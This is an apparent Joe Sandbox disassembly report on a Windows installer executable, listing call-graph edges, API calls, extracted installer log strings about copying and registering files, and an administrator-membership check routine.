408bf0 19 API calls 54038->54222 54039 46c8c3 54040 414b28 18 API calls 54039->54040 54041 46c8d1 54040->54041 54042 46c8de 54041->54042 54044 46c8f7 54041->54044 54231 47f454 57 API calls 54042->54231 54045 46c90f 54044->54045 54046 466ab0 CharNextA 54044->54046 54232 47f454 57 API calls 54045->54232 54048 46c90b 54046->54048 54048->54045 54049 46c925 54048->54049 54050 46c941 54049->54050 54051 46c92b 54049->54051 54053 42c9ac CharNextA 54050->54053 54233 47f454 57 API calls 54051->54233 54054 46c94e 54053->54054 54054->54033 54234 466b3c 18 API calls 54054->54234 54056 46c965 54057 4514cc 18 API calls 54056->54057 54058 46c972 54057->54058 54235 47f454 57 API calls 54058->54235 54061 4829e9 54060->54061 54062 4829bb 54060->54062 54064 47600c 54061->54064 54236 4953c4 32 API calls 54062->54236 54065 457db8 38 API calls 54064->54065 54066 476058 54065->54066 54067 4072b8 SetCurrentDirectoryA 54066->54067 54068 476062 54067->54068 54237 46e408 54068->54237 54072 476072 54245 45a1f0 54072->54245 54075 47c6f0 57 API calls 54076 4760c9 54075->54076 54078 4760d9 54076->54078 54667 4533b8 18 API calls 54076->54667 54079 4760fb 54078->54079 54668 4533b8 18 API calls 54078->54668 54081 479260 34 API calls 54079->54081 54082 476106 54081->54082 54249 47992c 54082->54249 54085 403450 18 API calls 54086 47612d 54085->54086 54087 403450 18 API calls 54086->54087 54088 47613b 54087->54088 54253 46eb5c 54088->54253 54223->53593 54230->54039 54231->54033 54232->54033 54233->54033 54234->54056 54235->54033 54236->54061 54238 46e47b 54237->54238 54240 46e425 54237->54240 54241 46e480 54238->54241 54239 479bdc 33 API calls 54239->54240 54240->54238 54240->54239 54242 46e4a6 54241->54242 54676 44fb90 54242->54676 54244 46e502 54244->54072 54246 45a1f6 54245->54246 54247 45a4d8 4 API calls 54246->54247 54248 45a212 54247->54248 54248->54075 54250 479939 54249->54250 54251 47610e 54250->54251 54252 4797d4 33 API calls 54250->54252 54251->54085 54252->54251 54254 46eb9a 54253->54254 54255 46eb8a 54253->54255 54257 403400 4 API calls 54254->54257 54256 403494 4 API calls 54255->54256 54258 46eb98 54256->54258 54257->54258 54259 455608 5 API calls 54258->54259 54260 46ebae 54259->54260 54261 455644 5 API calls 54260->54261 54262 46ebbc 54261->54262 54263 46eb34 19 API calls 54262->54263 54264 46ebd0 54263->54264 54265 45a2ac 18 API calls 54264->54265 54266 46ebe8 54265->54266 54267 403420 4 API calls 54266->54267 54268 46ec02 54267->54268 54269 403400 4 API calls 54268->54269 54270 46ec0a 54269->54270 54271 46ed68 54270->54271 54272 4034e0 18 API calls 54271->54272 54273 46eda5 54272->54273 54274 46edae 54273->54274 54275 46edbd 54273->54275 54276 47c6f0 57 API calls 54274->54276 54277 403400 4 API calls 54275->54277 54278 46edbb 54276->54278 54277->54278 54279 47c6f0 57 API calls 54278->54279 54280 46ede0 54279->54280 54281 46ee0f 54280->54281 54688 46ec1c 19 API calls 54280->54688 54685 46ed54 54281->54685 54285 47c6f0 57 API calls 54286 46ee50 54285->54286 54667->54078 54668->54079 54679 44fba4 54676->54679 54680 44fbb5 54679->54680 54681 44fba1 54680->54681 54682 44fbdf MulDiv 54680->54682 54681->54244 54683 4181f0 54682->54683 54684 44fc0a SendMessageA 54683->54684 54684->54681 54686 403494 4 API calls 54685->54686 54687 46ed63 54686->54687 54687->54285 54688->54281 55800 431f60 55761->55800 55763 43da66 55764 403400 4 API calls 55763->55764 55765 43daea 55764->55765 55765->53654 55765->53655 55767 431c4a 55766->55767 55768 402648 18 API calls 55767->55768 55769 431c7a 55768->55769 55770 494ed0 55769->55770 55771 494fa5 55770->55771 55775 494eea 55770->55775 55777 494fe8 55771->55777 55772 433de0 18 API calls 55772->55775 55775->55771 55775->55772 55776 403450 18 API calls 55775->55776 55805 408c1c 18 API calls 55775->55805 55806 431d14 55775->55806 55776->55775 55778 495004 55777->55778 55814 433de0 55778->55814 55780 495009 55781 431d14 18 API calls 55780->55781 55782 495014 55781->55782 55783 43d608 55782->55783 55784 43d635 55783->55784 55789 43d627 55783->55789 55784->53665 55785 43d6b1 55793 43d76b 55785->55793 55817 4470f8 55785->55817 55787 43d6fc 55823 43ddc4 55787->55823 55789->55784 55789->55785 55790 4470f8 18 API calls 55789->55790 55790->55789 55791 43d971 55791->55784 55843 447098 18 API calls 55791->55843 55793->55791 55794 43d952 55793->55794 55841 447098 18 API calls 55793->55841 55842 447098 18 API calls 55794->55842 55797->53667 55798->53669 55799->53656 55801 403494 4 API calls 55800->55801 55802 431f6f 55801->55802 55803 431f99 55802->55803 55804 403744 18 API calls 55802->55804 55803->55763 55804->55802 55805->55775 55807 431d22 55806->55807 55808 431d34 55806->55808 55812 402678 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55807->55812 55810 431d56 55808->55810 55813 431cb4 18 API calls 55808->55813 55810->55775 55812->55808 55813->55810 55815 402648 18 API calls 55814->55815 55816 433def 55815->55816 55816->55780 55818 447117 55817->55818 55819 44711e 55817->55819 55844 446ea4 18 API calls 55818->55844 55821 431d14 18 API calls 55819->55821 55822 44712e 55821->55822 55822->55787 55824 43dde0 55823->55824 55838 43de0d 55823->55838 55825 402660 4 API calls 55824->55825 55824->55838 55825->55824 55826 43de42 55826->55793 55828 43c9ac 18 API calls 55828->55838 55829 43ff19 55829->55826 55849 447098 18 API calls 55829->55849 55830 447098 18 API calls 55830->55838 55834 431cb4 18 API calls 55834->55838 55835 446ea4 18 API calls 55835->55838 55837 433d8c 18 API calls 55837->55838 55838->55826 55838->55828 55838->55829 55838->55830 55838->55834 55838->55835 55838->55837 55839 433b8c LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55838->55839 55840 4366c4 18 API calls 55838->55840 55845 436ec0 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55838->55845 55846 439754 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55838->55846 55847 43dcbc 32 API calls 55838->55847 55848 433da8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55838->55848 55839->55838 55840->55838 55841->55793 55842->55791 55843->55791 55844->55819 55845->55838 55846->55838 55847->55838 55848->55838 55849->55829 55850 42f594 55851 42f5a3 NtdllDefWindowProc_A 55850->55851 55852 42f59f 55850->55852 55851->55852 56433 480e7e 56434 480e87 56433->56434 56435 480eb1 56434->56435 56436 480e93 56434->56436 56811 47f7c0 38 API calls 56435->56811 56438 480ea8 56436->56438 56809 47f990 57 API calls 56436->56809 56810 47f7c0 38 API calls 56438->56810 56441 480eaf 56442 480eec 56441->56442 56443 480ede 56441->56443 56446 480f2b 56442->56446 56814 47f928 18 API calls 56442->56814 56812 47708c 203 API calls 56443->56812 56445 480f4f 56448 480f61 56445->56448 56449 480f67 56445->56449 56446->56445 56451 480f42 56446->56451 56452 480f44 56446->56452 56454 480f65 56448->56454 56461 47f96c 57 API calls 56448->56461 56449->56454 56458 47f96c 57 API calls 56449->56458 56450 480f1e 56815 47f990 57 API calls 56450->56815 56457 47f96c 57 API calls 56451->56457 56816 47fa00 57 API calls 56452->56816 56453 480ee3 56453->56442 56813 408bf0 19 API calls 56453->56813 56568 47caf0 56454->56568 56457->56445 56458->56454 56461->56454 56462 480f8e 56642 47d018 56462->56642 56569 42d8a8 GetWindowsDirectoryA 56568->56569 56570 47cb14 56569->56570 56571 403450 18 API calls 56570->56571 56572 47cb21 56571->56572 56573 42d8d4 GetSystemDirectoryA 56572->56573 56574 47cb29 56573->56574 56575 403450 18 API calls 56574->56575 56576 47cb36 56575->56576 56577 42d900 6 API calls 56576->56577 56578 47cb3e 56577->56578 56579 403450 18 API calls 56578->56579 56580 47cb4b 56579->56580 56581 47cb54 56580->56581 56582 47cb70 56580->56582 56850 42d218 56581->56850 56584 403400 4 API calls 56582->56584 56586 47cb6e 56584->56586 56588 47cbb5 56586->56588 56590 42c8dc 19 API calls 56586->56590 56587 403450 18 API calls 56587->56586 56830 47c978 56588->56830 56592 47cb90 56590->56592 56593 403450 18 API calls 56592->56593 56595 47cb9d 56593->56595 56594 403450 18 API calls 56596 47cbd1 56594->56596 56595->56588 56598 403450 18 API calls 56595->56598 56597 47cbef 56596->56597 56599 4035c0 18 API calls 56596->56599 56600 47c978 22 API calls 56597->56600 56598->56588 56599->56597 56601 47cbfe 56600->56601 56602 403450 18 API calls 56601->56602 56603 47cc0b 56602->56603 56604 47cc33 56603->56604 56605 42c40c 19 API calls 56603->56605 56606 47cc9a 56604->56606 56609 47c978 22 API calls 56604->56609 56607 47cc21 56605->56607 56608 47cd62 56606->56608 56611 47ccba SHGetKnownFolderPath 56606->56611 56610 4035c0 18 API calls 56607->56610 56613 47cd8c 56608->56613 56614 47cd6b 56608->56614 56612 47cc4b 56609->56612 56610->56604 56616 47ccd4 56611->56616 56617 47cd0f SHGetKnownFolderPath 56611->56617 56618 403450 18 API calls 56612->56618 56615 42c40c 19 API calls 56613->56615 56619 42c40c 19 API calls 56614->56619 56621 47cd99 56615->56621 56860 403ba4 21 API calls 56616->56860 56617->56608 56624 47cd29 56617->56624 56623 47cc58 56618->56623 56620 47cd78 56619->56620 56625 4035c0 18 API calls 56620->56625 56626 4035c0 18 API calls 56621->56626 56628 47cc6b 56623->56628 56858 4533b8 18 API calls 56623->56858 56861 403ba4 21 API calls 56624->56861 56630 47cd8a 56625->56630 56626->56630 56627 47ccef CoTaskMemFree 56627->56462 56633 47c978 22 API calls 56628->56633 56841 47ca5c 56630->56841 56632 47cd44 CoTaskMemFree 56632->56462 56635 47cc7a 56633->56635 56637 403450 18 API calls 56635->56637 56638 47cc87 56637->56638 56638->56606 56859 4533b8 18 API calls 56638->56859 56639 403400 4 API calls 56640 47cdc5 56639->56640 56640->56462 56643 47d020 56642->56643 56643->56643 56863 453a98 56643->56863 56646 403450 18 API calls 56647 47d04d 56646->56647 56648 403494 4 API calls 56647->56648 56649 47d05a 56648->56649 56650 40357c 18 API calls 56649->56650 56651 47d068 56650->56651 56652 457db8 38 API calls 56651->56652 56654 47d070 56652->56654 56653 47d083 56656 42c40c 19 API calls 56653->56656 56654->56653 56893 4575b0 20 API calls 56654->56893 56657 47d090 56656->56657 56658 4035c0 18 API calls 56657->56658 56659 47d0a0 56658->56659 56660 47d0aa CreateDirectoryA 56659->56660 56661 47d110 56660->56661 56662 47d0b4 GetLastError 56660->56662 56881 4584b8 56661->56881 56664 4514cc 18 API calls 56662->56664 56666 47d0cc 56664->56666 56665 47d11d 56667 47d146 56665->56667 56669 4035c0 18 API calls 56665->56669 56894 406d78 33 API calls 56666->56894 56671 403420 4 API calls 56667->56671 56672 47d133 56669->56672 56670 47d0dc 56673 42e8d8 19 API calls 56670->56673 56674 47d160 56671->56674 56888 47cfc0 56672->56888 56677 47d0ec 56673->56677 56675 403420 4 API calls 56674->56675 56678 47d16d 56675->56678 56680 45149c 18 API calls 56677->56680 56684 47d2fc 56678->56684 56681 47d101 56680->56681 56895 408c1c 18 API calls 56681->56895 56685 42c40c 19 API calls 56684->56685 56686 47d328 56685->56686 56687 4035c0 18 API calls 56686->56687 56688 47d338 56687->56688 56689 47cfc0 39 API calls 56688->56689 56690 47d345 56689->56690 56957 45264c 56690->56957 56809->56438 56810->56441 56811->56441 56812->56453 56814->56450 56815->56446 56816->56445 56831 42de2c RegOpenKeyExA 56830->56831 56832 47c99e 56831->56832 56833 47c9c4 56832->56833 56834 47c9a2 56832->56834 56835 403400 4 API calls 56833->56835 56836 42dd5c 20 API calls 56834->56836 56837 47c9cb 56835->56837 56838 47c9ae 56836->56838 56837->56594 56839 47c9b9 RegCloseKey 56838->56839 56840 403400 4 API calls 56838->56840 56839->56837 56840->56839 56842 47ca6a 56841->56842 56843 42de2c RegOpenKeyExA 56842->56843 56844 47ca92 56843->56844 56845 47cac3 56844->56845 56846 42dd5c 20 API calls 56844->56846 56845->56639 56847 47caa8 56846->56847 56848 42dd5c 20 API calls 56847->56848 56849 47caba RegCloseKey 56848->56849 56849->56845 56851 4038a4 18 API calls 56850->56851 56853 42d22b 56851->56853 56852 42d242 GetEnvironmentVariableA 56852->56853 56854 42d24e 56852->56854 56853->56852 56857 42d255 56853->56857 56862 42dbe0 18 API calls 56853->56862 56855 403400 4 API calls 56854->56855 56855->56857 56857->56587 56858->56628 56859->56606 56860->56627 56861->56632 56862->56853 56872 453ab8 56863->56872 56865 453824 25 API calls 56865->56872 56866 453add CreateDirectoryA 56867 453b55 56866->56867 56868 453ae7 GetLastError 56866->56868 56869 403494 4 API calls 56867->56869 56868->56872 56870 453b5f 56869->56870 56873 403420 4 API calls 56870->56873 56871 4514cc 18 API calls 56871->56872 56872->56865 56872->56866 56872->56871 56878 42e8d8 19 API calls 56872->56878 56879 45149c 18 API calls 56872->56879 56897 42da28 56872->56897 56920 406d78 33 API calls 56872->56920 56921 408c1c 18 API calls 56872->56921 56875 453b79 56873->56875 56876 403420 4 API calls 56875->56876 56877 453b86 56876->56877 56877->56646 56878->56872 56879->56872 56882 4584c4 56881->56882 56883 4584d2 56881->56883 56884 403494 4 API calls 56882->56884 56885 403400 4 API calls 56883->56885 56886 4584d0 56884->56886 56887 4584d9 56885->56887 56886->56665 56887->56665 56889 40cf5c 37 API calls 56888->56889 56890 47cfdc 56889->56890 56922 47cee4 56890->56922 56893->56653 56894->56670 56895->56661 56898 42d218 19 API calls 56897->56898 56899 42da4e 56898->56899 56900 42da5a 56899->56900 56901 42cd58 21 API calls 56899->56901 56902 42d218 19 API calls 56900->56902 56904 42daa6 56900->56904 56901->56900 56903 42da6a 56902->56903 56905 42da76 56903->56905 56906 42cd58 21 API calls 56903->56906 56908 42c814 19 API calls 56904->56908 56905->56904 56907 42da9b 56905->56907 56909 42d218 19 API calls 56905->56909 56906->56905 56907->56904 56910 42d8a8 GetWindowsDirectoryA 56907->56910 56911 42dab0 56908->56911 56912 42da8f 56909->56912 56910->56904 56913 42c40c 19 API calls 56911->56913 56912->56907 56916 42cd58 21 API calls 56912->56916 56914 42dabb 56913->56914 56915 403494 4 API calls 56914->56915 56917 42dac5 56915->56917 56916->56907 56918 403420 4 API calls 56917->56918 56919 42dadf 56918->56919 56919->56872 56920->56872 56921->56872 56929 40cdb0 56922->56929 56934 40cc60 56929->56934 56931 40cdca 56946 40cd98 56931->56946 56935 40cc6d 56934->56935 56936 40cc89 56935->56936 56937 40ccbe 56935->56937 56950 406ed0 56936->56950 56954 406e90 CreateFileA 56937->56954 56940 40cc90 56942 40ccb7 56940->56942 56953 408d3c 33 API calls 56940->56953 56941 40ccc8 56941->56942 56955 408d3c 33 API calls 56941->56955 56942->56931 56945 40ccef 56945->56942 56947 40cda0 56946->56947 56951 403738 56950->56951 56952 406eec CreateFileA 56951->56952 56952->56940 56953->56942 56954->56941 56955->56945 56963 452584 56957->56963 56964 403738 56963->56964 58339 4222f4 58340 422303 58339->58340 58345 421284 58340->58345 58343 422323 58346 4212f3 58345->58346 58347 421293 58345->58347 58348 421304 58346->58348 58370 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 58346->58370 58347->58346 58369 408d3c 33 API calls 58347->58369 58350 4213ca 58348->58350 58351 421332 58348->58351 58353 4213a3 58350->58353 58357 4213de SetMenu 58350->58357 58352 4213a5 58351->58352 58358 42134d 58351->58358 58352->58353 58360 4213b9 58352->58360 58354 4213f6 58353->58354 58372 421e3c 25 API calls 58353->58372 58373 4211cc 24 API calls 58354->58373 58357->58353 58358->58353 58363 421370 GetMenu 58358->58363 58359 4213fd 58359->58343 58368 4221f8 10 API calls 58359->58368 58362 4213c2 SetMenu 58360->58362 58362->58353 58364 421393 58363->58364 58365 42137a 58363->58365 58371 4124e0 GetMenuItemCount GetMenuStringA GetMenuState 58364->58371 58367 42138d SetMenu 58365->58367 58367->58364 58368->58343 58369->58347 58370->58348 58371->58353 58372->58354 58373->58359 55853 435954 55855 435969 55853->55855 55854 435983 55855->55854 55859 43533c 55855->55859 55865 435386 55859->55865 55869 43536c 55859->55869 55860 403400 4 API calls 55861 43578b 55860->55861 55861->55854 55872 43579c 18 API calls 55861->55872 55862 446e18 18 API calls 55862->55869 55863 403450 18 API calls 55863->55869 55864 402648 18 API calls 55864->55869 55865->55860 55866 431d14 18 API calls 55866->55869 55868 4038a4 18 API calls 55868->55869 55869->55862 55869->55863 55869->55864 55869->55865 55869->55866 55869->55868 55870 403744 18 API calls 55869->55870 55873 434424 55869->55873 55885 434be8 18 API calls 55869->55885 55870->55869 55872->55854 55874 4344e1 55873->55874 55875 434451 55873->55875 55904 434384 18 API calls 55874->55904 55877 403494 4 API calls 55875->55877 55878 43445f 55877->55878 55879 403778 18 API calls 55878->55879 55883 434480 55879->55883 55880 403400 4 API calls 55881 434531 55880->55881 55881->55869 55882 4344d3 55882->55880 55883->55882 55886 49501c 55883->55886 55885->55869 55887 4950ec 55886->55887 55888 495054 55886->55888 55905 4489a4 55887->55905 55890 403494 4 API calls 55888->55890 55891 49505f 55890->55891 55893 49506f 55891->55893 55895 4037b8 18 API calls 55891->55895 55892 403400 4 API calls 55894 495110 55892->55894 55893->55892 55896 403400 4 API calls 55894->55896 55898 495088 55895->55898 55897 495118 55896->55897 55897->55883 55898->55893 55899 4037b8 18 API calls 55898->55899 55900 4950ab 55899->55900 55901 403778 18 API calls 55900->55901 55902 4950dc 55901->55902 55903 403634 18 API calls 55902->55903 55903->55887 55904->55882 55906 4489c9 55905->55906 55916 448a0c 55905->55916 55907 403494 4 API calls 55906->55907 55908 4489d4 55907->55908 55913 4037b8 18 API calls 55908->55913 55909 448a20 55911 403400 4 API calls 55909->55911 55912 448a53 55911->55912 55912->55893 55914 4489f0 55913->55914 55915 4037b8 18 API calls 55914->55915 55915->55916 55916->55909 55917 4485a0 55916->55917 55918 403494 4 API calls 55917->55918 55919 4485d6 55918->55919 55920 4037b8 18 API calls 55919->55920 55921 4485e8 55920->55921 55922 403778 18 API calls 55921->55922 55923 448609 55922->55923 55924 4037b8 18 API calls 55923->55924 55925 448621 55924->55925 55926 403778 18 API calls 55925->55926 55927 44864c 55926->55927 55928 4037b8 18 API calls 55927->55928 55929 448664 55928->55929 55931 448737 55929->55931 55933 4486bf LoadLibraryExA 55929->55933 55934 4486d1 LoadLibraryA 55929->55934 55937 44869c 55929->55937 55938 403b80 18 API calls 55929->55938 55939 403450 18 API calls 55929->55939 55941 43dafc 18 API calls 55929->55941 55930 403420 4 API calls 55932 44877c 55930->55932 55935 44873f GetProcAddress 55931->55935 55932->55909 55933->55929 55934->55929 55936 448752 55935->55936 55936->55937 55937->55930 55938->55929 55939->55929 55941->55929 55942 44b51c 55943 44b52a 55942->55943 55945 44b549 55942->55945 55944 44b400 25 API calls 55943->55944 55943->55945 55944->55945 55946 44879c 55947 4487d1 55946->55947 55948 4487ca 55946->55948 55949 4487e5 55947->55949 55950 4485a0 21 API calls 55947->55950 55952 403400 4 API calls 55948->55952 55949->55948 55951 403494 4 API calls 55949->55951 55950->55949 55954 4487fe 55951->55954 55953 44897b 55952->55953 55955 4037b8 18 API calls 55954->55955 55956 44881a 55955->55956 55957 4037b8 18 API calls 55956->55957 55958 448836 55957->55958 55958->55948 55959 44884a 55958->55959 55960 4037b8 18 API calls 55959->55960 55961 448864 55960->55961 55962 431c44 18 API calls 55961->55962 55963 448886 55962->55963 55964 431d14 18 API calls 55963->55964 55971 4488a6 55963->55971 55964->55963 55965 4488fc 55978 4423a8 55965->55978 55966 4488e4 55966->55965 55990 443644 18 API calls 55966->55990 55970 448930 GetLastError 55991 448534 18 API calls 55970->55991 55971->55966 55989 443644 18 API calls 55971->55989 55973 44893f 55992 443684 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55973->55992 55975 448954 55993 443694 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 55975->55993 55977 44895c 55979 443386 55978->55979 55980 4423e1 55978->55980 55982 403400 4 API calls 55979->55982 55981 403400 4 API calls 55980->55981 55983 4423e9 55981->55983 55984 44339b 55982->55984 55985 431c44 18 API calls 55983->55985 55984->55970 55987 4423f5 55985->55987 55986 443376 55986->55970 55987->55986 55994 441a80 18 API calls 55987->55994 55989->55971 55990->55965 55991->55973 55992->55975 55993->55977 55994->55987 58374 46e6bc 58375 46e6c7 58374->58375 58378 46e514 58375->58378 58379 46e53d 58378->58379 58380 46e55a 58379->58380 58382 44fba4 2 API calls 58379->58382 58388 46e26c 58380->58388 58382->58380 58384 46e5e9 58386 46e59f 58386->58384 58392 4953c4 32 API calls 58386->58392 58389 46e1e4 2 API calls 58388->58389 58390 46e27a 58389->58390 58390->58384 58391 495368 18 API calls 58390->58391 58391->58386 58392->58384 58393 4165fc DestroyWindow 58394 42e3ff SetErrorMode
                                                                                  Strings
                                                                                  • Skipping due to "onlyifdestfileexists" flag., xrefs: 004710F2
                                                                                  • @, xrefs: 004709A8
                                                                                  • Existing file is protected by Windows File Protection. Skipping., xrefs: 00470FE4
                                                                                  • InUn, xrefs: 00471357
                                                                                  • -- File entry --, xrefs: 004708F3
                                                                                  • Dest file is protected by Windows File Protection., xrefs: 00470AE5
                                                                                  • Version of existing file: %u.%u.%u.%u, xrefs: 00470D74
                                                                                  • Time stamp of our file: (failed to read), xrefs: 00470B9F
                                                                                  • Existing file's SHA-1 hash matches our file. Skipping., xrefs: 00470EAD
                                                                                  • Existing file has a later time stamp. Skipping., xrefs: 00470FC7
                                                                                  • Non-default bitness: 32-bit, xrefs: 00470AB3
                                                                                  • Failed to read existing file's SHA-1 hash. Proceeding., xrefs: 00470EC8
                                                                                  • Time stamp of existing file: (failed to read), xrefs: 00470C2F
                                                                                  • Installing the file., xrefs: 00471101
                                                                                  • Incrementing shared file count (32-bit)., xrefs: 0047179D
                                                                                  • Dest file exists., xrefs: 00470BB3
                                                                                  • , xrefs: 00470DC7, 00470F98, 00471016
                                                                                  • Same time stamp. Skipping., xrefs: 00470F4D
                                                                                  • .tmp, xrefs: 004711AF
                                                                                  • Version of our file: (none), xrefs: 00470CF4
                                                                                  • Existing file's SHA-1 hash is different from our file. Proceeding., xrefs: 00470EBC
                                                                                  • Incrementing shared file count (64-bit)., xrefs: 00471784
                                                                                  • Existing file is a newer version. Skipping., xrefs: 00470DFA
                                                                                  • Version of existing file: (none), xrefs: 00470EF2
                                                                                  • Will register the file (a DLL/OCX) later., xrefs: 00471717
                                                                                  • Time stamp of existing file: %s, xrefs: 00470C23
                                                                                  • Same version. Skipping., xrefs: 00470EDD
                                                                                  • Non-default bitness: 64-bit, xrefs: 00470AA7
                                                                                  • Uninstaller requires administrator: %s, xrefs: 00471387
                                                                                  • Skipping due to "onlyifdoesntexist" flag., xrefs: 00470BC6
                                                                                  • User opted not to overwrite the existing file. Skipping., xrefs: 00471045
                                                                                  • Dest filename: %s, xrefs: 00470A8C
                                                                                  • Version of our file: %u.%u.%u.%u, xrefs: 00470CE8
                                                                                  • Will register the file (a type library) later., xrefs: 0047170B
                                                                                  • Time stamp of our file: %s, xrefs: 00470B93
                                                                                  • Stripped read-only attribute., xrefs: 004710BF
                                                                                  • Failed to strip read-only attribute., xrefs: 004710CB
                                                                                  • Couldn't read time stamp. Skipping., xrefs: 00470F2D
                                                                                  • User opted not to strip the existing file's read-only attribute. Skipping., xrefs: 0047108E
                                                                                  • Installing into GAC, xrefs: 0047190C
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID:
                                                                                  • String ID: $-- File entry --$.tmp$@$Couldn't read time stamp. Skipping.$Dest file exists.$Dest file is protected by Windows File Protection.$Dest filename: %s$Existing file has a later time stamp. Skipping.$Existing file is a newer version. Skipping.$Existing file is protected by Windows File Protection. Skipping.$Existing file's SHA-1 hash is different from our file. Proceeding.$Existing file's SHA-1 hash matches our file. Skipping.$Failed to read existing file's SHA-1 hash. Proceeding.$Failed to strip read-only attribute.$InUn$Incrementing shared file count (32-bit).$Incrementing shared file count (64-bit).$Installing into GAC$Installing the file.$Non-default bitness: 32-bit$Non-default bitness: 64-bit$Same time stamp. Skipping.$Same version. Skipping.$Skipping due to "onlyifdestfileexists" flag.$Skipping due to "onlyifdoesntexist" flag.$Stripped read-only attribute.$Time stamp of existing file: %s$Time stamp of existing file: (failed to read)$Time stamp of our file: %s$Time stamp of our file: (failed to read)$Uninstaller requires administrator: %s$User opted not to overwrite the existing file. Skipping.$User opted not to strip the existing file's read-only attribute. Skipping.$Version of existing file: %u.%u.%u.%u$Version of existing file: (none)$Version of our file: %u.%u.%u.%u$Version of our file: (none)$Will register the file (a DLL/OCX) later.$Will register the file (a type library) later.
                                                                                  • API String ID: 0-4021121268
                                                                                  • Opcode ID: 9f2865767024a930b7916cd63da71f425be50596fff11d1e8904fa8c666432a3
                                                                                  • Instruction ID: 467263080efe338566352cc629e32221acf2e6aeb32e26e45aec936313cc1361
                                                                                  • Opcode Fuzzy Hash: 9f2865767024a930b7916cd63da71f425be50596fff11d1e8904fa8c666432a3
                                                                                  • Instruction Fuzzy Hash: AA927434A04288DFDB11DFA9C445BDDBBB4AF05304F1480ABE848BB392D7789E49DB59

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 1578 42e0ac-42e0bd 1579 42e0c8-42e0ed AllocateAndInitializeSid 1578->1579 1580 42e0bf-42e0c3 1578->1580 1581 42e297-42e29f 1579->1581 1582 42e0f3-42e110 GetVersion 1579->1582 1580->1581 1583 42e112-42e127 GetModuleHandleA GetProcAddress 1582->1583 1584 42e129-42e12b 1582->1584 1583->1584 1585 42e152-42e16c GetCurrentThread OpenThreadToken 1584->1585 1586 42e12d-42e13b CheckTokenMembership 1584->1586 1589 42e1a3-42e1cb GetTokenInformation 1585->1589 1590 42e16e-42e178 GetLastError 1585->1590 1587 42e141-42e14d 1586->1587 1588 42e279-42e28f FreeSid 1586->1588 1587->1588 1593 42e1e6-42e20a call 402648 GetTokenInformation 1589->1593 1594 42e1cd-42e1d5 GetLastError 1589->1594 1591 42e184-42e197 GetCurrentProcess OpenProcessToken 1590->1591 1592 42e17a-42e17f call 4031bc 1590->1592 1591->1589 1597 42e199-42e19e call 4031bc 1591->1597 1592->1581 1604 42e218-42e220 1593->1604 1605 42e20c-42e216 call 4031bc * 2 1593->1605 1594->1593 1598 42e1d7-42e1e1 call 4031bc * 2 1594->1598 1597->1581 1598->1581 1609 42e222-42e223 1604->1609 1610 42e253-42e271 call 402660 CloseHandle 1604->1610 1605->1581 1614 42e225-42e238 EqualSid 1609->1614 1617 42e23a-42e247 1614->1617 1618 42e24f-42e251 1614->1618 1617->1618 1620 42e249-42e24d 1617->1620 1618->1610 1618->1614 1620->1610
                                                                                  APIs
                                                                                  • AllocateAndInitializeSid.ADVAPI32(0049A788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E0E6
                                                                                  • GetVersion.KERNEL32(00000000,0042E290,?,0049A788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E103
                                                                                  • GetModuleHandleA.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,0042E290,?,0049A788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E11C
                                                                                  • GetProcAddress.KERNEL32(00000000,advapi32.dll), ref: 0042E122
                                                                                  • CheckTokenMembership.KERNELBASE(00000000,00000000,?,00000000,0042E290,?,0049A788,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E137
                                                                                  • FreeSid.ADVAPI32(00000000,0042E297,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0042E28A
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000001.00000002.3368671255.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000001.00000002.3368621738.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368835598.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3368990987.000000000049B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369128936.000000000049C000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000001.00000002.3369156876.00000000004AC000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_1_2_400000_file.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressAllocateCheckFreeHandleInitializeMembershipModuleProcTokenVersion
                                                                                  • String ID: CheckTokenMembership$advapi32.dll
                                                                                  • API String ID: 2252812187-1888249752
                                                                                  • Opcode ID: 7c80af42b102e27edf5db655613db814b4685419315c422c8b7ce9c7c8cae370
                                                                                  • Instruction ID: b767a2b0357b006b48fec58faac565969e4e2695d2e87526588baf6f991b03ff
